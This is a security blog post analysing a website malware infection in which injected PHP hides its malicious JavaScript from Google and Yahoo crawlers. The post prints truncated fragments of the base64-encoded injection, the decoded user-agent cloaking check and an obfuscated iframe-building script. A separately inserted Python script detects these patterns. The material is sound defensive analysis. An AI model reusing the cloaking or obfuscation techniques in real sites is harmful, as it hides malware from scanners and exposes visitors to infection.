Malware hiding from Google

April 7, 2010 by David Dede

Google is getting pretty good at detecting web-based malware and blacklisting the sites that host it. This means bad business for the attackers (or "hackers", as the media like to call them), and as a result they are already changing their tactics to hide from Google.

Why is this bad business for the malware writers? Well, if a site gets blacklisted, fewer users will visit it, so fewer people will load the malware and get infected. Good for everyone else, bad for them.

Anyway, yesterday we were analyzing a piece of malware that added the following code to the index.php of a site:

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCc…
long long long line.. ?>

After decoding it, we got code that looked like this:

if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&&
(!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo")))
{
return base64_decode("PHNjcmlwdD5.. ..KS5qb2luKCIiKSk7PC9zY3JpcHQ+");
}
else
{
return "";
}

So basically the malware was checking whether the user agent belonged to the Google or Yahoo bot and, in that case, not returning the malicious code. Everyone else would be served the malicious JavaScript:

var bpxDsSbm8='d*%@o*%@c*%@u*%@%@a*%@.. %@t*%@p*%@:*%@/*%@/*%@n*%@i*%@n*%@o*
%@"*%@ *%@w*%@i*%@d*%@t*%@h*%@=*%@2*%@.. *%@h*%@e*%@i*%@g*%@h*%@t*%@=*%@2*%@
*%@f*%@r*%@a*%@m*%@e*%@b*%@o*%@r*%@d*%.. @e*%@r*%@=*%@0*%@>*%@<*%@/*%@i*%@f*%@r
;eval(bpxDsSbm8.split('*%@').join(""));

If this becomes a trend, Google will have to stop using its well-known user agent and IP addresses for its malware checks.
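The two tricks above (a user-agent check hidden behind eval(base64_decode()) and a JavaScript string reassembled with split().join()) are easy to triage mechanically. The script below is an added example, not code from the post or from Sucuri; its samples are constructed to mirror the patterns shown, the iframe target is a placeholder, and the real payload is not reproduced.

```python
import base64
import re

# Constructed samples (not the real payload): a cloaking stub like the decoded
# PHP above, wrapped in eval(base64_decode()), plus a split/join JS string.
DECODED_PHP = (
    'if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&&\n'
    '(!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))) { return "<script>"; }\n'
    'else { return ""; }'
)
RAW_INDEX_PHP = ('<?php /**/ eval(base64_decode("'
                 + base64.b64encode(DECODED_PHP.encode()).decode() + '")); ?>')
HIDDEN_HTML = '<iframe src="http://example.invalid/" width=2 height=2></iframe>'
RAW_JS = ("var bpxDsSbm8='" + "*%@".join(HIDDEN_HTML) + "';"
          "eval(bpxDsSbm8.split('*%@').join(\"\"));")

EVAL_B64 = re.compile(r"""eval\s*\(\s*base64_decode\s*\(\s*['"]([A-Za-z0-9+/=]+)['"]""")
UA_CHECK = re.compile(
    r"""stristr\s*\(\s*\$_SERVER\s*\[\s*['"]HTTP_USER_AGENT['"]\s*\]\s*,\s*['"]([^'"]+)['"]""",
    re.I)
SPLIT_JOIN = re.compile(
    r"""var\s+(\w+)\s*=\s*(['"])(.*?)\2\s*;.*?\b\1\.split\((['"])(.*?)\4\)\s*\.join\(""",
    re.DOTALL)
IFRAME_SRC = re.compile(r"""<iframe[^>]*\ssrc\s*=\s*["']?([^"'\s>]+)""", re.I)

def decode_eval_base64(php):
    """Return the decoded body of every eval(base64_decode("...")) call."""
    return [base64.b64decode(b).decode("utf-8", "replace") for b in EVAL_B64.findall(php)]

def cloaked_user_agents(php):
    """Substrings compared against HTTP_USER_AGENT: the cloaking signal."""
    return sorted({ua.lower() for ua in UA_CHECK.findall(php)})

def undo_split_join(js):
    """Rebuild the string that var.split(delim).join("") would produce."""
    m = SPLIT_JOIN.search(js)
    if not m:
        return None
    blob, delim = m.group(3), m.group(5)
    return blob.replace(delim, "")  # same result as split(delim).join("")

def iframe_sources(html):
    """List the src targets of any iframes in the recovered markup."""
    return IFRAME_SRC.findall(html)

if __name__ == "__main__":
    for body in decode_eval_base64(RAW_INDEX_PHP):
        print("user agents excluded from the payload:", cloaked_user_agents(body))
    html = undo_split_join(RAW_JS)
    print("hidden markup:", html)
    print("iframe targets:", iframe_sources(html))
```

A non-empty result from cloaked_user_agents on decoded code is a strong indicator on its own, since legitimate themes rarely branch on "googlebot" inside an eval'd blob.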


Categories: Website Malware Infections, Website Security. Tags: Google, Hacked Websites, Obfuscation

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Comments

  1. Tony

    April 7, 2010

    There is another WordPress hack happening this week where the code only returns bogus information if the user agent is Google.

    http://blog.arpitnext.com/2010/04/wordpress-search-engine-cloak-hack.html

    Any chance you can get the sucuri monitoring service to make requests as googlebot in addition to a normal browser? Just make sure you don't diff the browser vs bot content as they are sometimes different intentionally, but still send alerts anytime there is a change for either user agent.

  2. Anonymous

    April 8, 2010

    "If that becomes a trend, Google will have to stop using their user agent/common IP address for the malware check" -> or maybe we have to begin to use their user agent to be ignored from malware 🙂

  3. http://sucuri.net

    April 8, 2010

    @anonymous: That would be a funny thing to do 🙂 I wonder what the malware writers would do at that point.. lol
